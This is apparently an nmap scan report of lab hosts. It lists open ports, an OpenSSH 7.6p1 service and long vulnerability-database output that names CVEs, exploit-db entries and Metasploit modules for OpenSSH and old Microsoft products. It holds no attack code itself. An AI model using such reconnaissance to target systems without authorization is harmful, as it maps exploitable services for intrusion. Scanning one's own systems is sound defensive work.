ActiveX COM Object Memory Corruption [28539] Microsoft Word 2000 Unspecified Code Execution [24121] Microsoft Commerce Server 2002 authfiles/login.asp Authentication Bypass [24081] Microsoft Outlook 2003 Unspecified Malformed Word Attachment DoS [23484] Microsoft SQLServer 2000 sp_addalias Procedure Privileged Alias Creation [23234] Microsoft SQLServer 2000 Unspecified Invalid Client Buffer DoS [23231] Microsoft SQL Server 2000 SQL Profiler Multiple Method DoS [23205] Microsoft SQLServer 2000 Crafted Sort Command User Mode Scheduler (UMS) Bypass DoS [23203] Microsoft SQL Server 2000 Database Name Transact-SQL Statement Privilege Escalation [23202] Microsoft SQLServer 2000 sysmembers Virtual Table Query Overflow [23201] Microsoft SQL Server 2000 Dynamic Transact-SQL Statement Disclosure [23200] Microsoft SQLServer 2000 Encrypted Stored Procedure Dynamic Query Disclosure [21907] Microsoft Office InfoPath 2003 Mshtml.dll Form Handling DoS [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19264] Microsoft Exchange Server 2003 Crafted IMAP4 Folder Listing Request DoS [17031] Microsoft ISA Server 2000 SecureNAT Traffic Saturation DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [14617] Microsoft Exchange Server 2003 Folder Handling DoS [14430] Microsoft Commerce Server 2000 Profile Service Affected API Overflow [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13762] Microsoft 2000 Domain Controller Directory Service Restore Mode Blank Password [13761] Microsoft Exchange 2000 Malformed URL Request DoS [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [11958] Microsoft Outlook 2003 Image Rendering Security Policy Bypass [11945] Microsoft Outlook 2002 IFRAME Tag Embedded URL [11944] Microsoft Outlook 2002 HREF Tag Embedded JavaScript Execution [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11712] Microsoft ISA Server 2000 H.323 Filter Overflow [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [8243] Microsoft SMS Port 2702 DoS [7202] Microsoft PowerPoint 2000 File Loader Overflow [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [6971] Microsoft ISA Server 2000 ICMP Rule Bypass During Startup [6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure [6969] Microsoft ISA Server 2000 Invalid DNS Request DoS [6968] Microsoft ISA Server 2000 FTP Port Scan Bounce Weakness [6967] Microsoft ISA Server 2000 UDP Packet Winsock DoS [6965] Microsoft ISA Server 2000 SSL Packet DoS [6964] Microsoft ISA Server 2000 DNS Intrusion Detection Filter DoS [6515] Microsoft Windows 2000 Domain Expired Account Authentication [5179] Microsoft Windows 2000 microsoft-ds DoS [5171] Microsoft Word 2002 Mail Merge Tool Execute Arbitrary Script [4779] Microsoft Desktop Engine (MSDE) 2000 Stored Procedure SQL Injection [4778] Microsoft SQL Server 2000 Stored Procedure SQL Injection [4777] Microsoft Desktop Engine (MSDE) 2000 Database Consistency Checkers (DBCCs) Overflow [4776] Microsoft SQL Server 2000 Database Consistency Checkers (DBCCs) 2000 Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [4168] Microsoft Outlook 2002 mailto URI Script Injection [3490] Microsoft Exchange 2003 OWA Mailbox Access Information Disclosure [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [1949] Symantec Norton Anti-Virus for Microsoft Exchange 2000 INBOX Path Information Disclosure [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1500] Microsoft Word / Excel / Powerpoint 2000 Object Tag Buffer Overflow [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1328] Microsoft Office 2000 UA Control ActiveX (Ouactrl.ocx) Show Me Function Remote Code Execution [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [773] Microsoft Windows 2000 Group Policy File Lock DoS [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [307] Microsoft FrontPage 2000 Server Extensions shtml.exe Path Disclosure [69085] Microsoft Office 2010 RTF File Handling pFragments Buffer Overflow Arbitrary Code Execution
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.

Host Script Output

Script Name	Output
samba-vuln-cve-2012-1182	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
smb-vuln-ms10-054	false
smb-vuln-ms10-061	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Misc Metrics (click to expand)

192.168.2.3(online)

Address

192.168.2.3 (ipv4)
00:0C:29:14:7D:40 - VMware (mac)

Ports

The 996 ports scanned but not shown below are in state: closed

996 ports replied with: reset

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
22	tcp	open	ssh	syn-ack	OpenSSH	7.6p1 Ubuntu 4ubuntu0.6	Ubuntu Linux; protocol 2.0
	vulners	cpe:/a:openbsd:openssh:7.6p1: 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A EXPLOIT MSF:ILITIES/UBUNTU-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-25017/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ EXPLOIT MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ EXPLOIT MSF:ILITIES/IBM-AIX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ EXPLOIT EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 EXPLOIT EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 EXPLOIT EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 EXPLOIT EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 EXPLOIT CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 EXPLOIT 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 EXPLOIT SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM EXPLOIT PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 EXPLOIT MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS EXPLOIT EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 EXPLOIT EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 EXPLOIT EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 EXPLOIT EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 EXPLOIT CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 EXPLOIT CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ EXPLOIT CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 EXPLOIT MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS/ 0.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS/ EXPLOIT 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 EXPLOIT
	vulscan	VulDB - https://vuldb.com: [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config privilege escalation [130370] OpenSSH 7.9 privilege escalation [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter privilege escalation [129007] OpenSSH 7.9 scp Client scp.c privilege escalation [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c Username information disclosure [123011] OpenSSH up to 7.7 auth2-gss.c information disclosure [112267] OpenSSH up to 7.3 sshd kex.c/packet.c denial of service [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open privilege escalation [94611] OpenSSH up to 7.3 Access Control privilege escalation [94610] OpenSSH up to 7.3 Shared Memory Manager memory corruption [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation [90671] OpenSSH up to 7.2 auth-passwd.c auth_password privilege escalation [90405] OpenSSH up to 7.2p2 sshd information disclosure [90404] OpenSSH up to 7.2p2 sshd information disclosure [90403] OpenSSH up to 7.2p2 sshd denial of service [89622] OpenSSH 7.2p2 Authentication Username information disclosure [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation [80656] OpenBSD OpenSSH 7.1 X11 Forwarding 7PK Security Features [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption MITRE CVE - https://cve.mitre.org: [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure 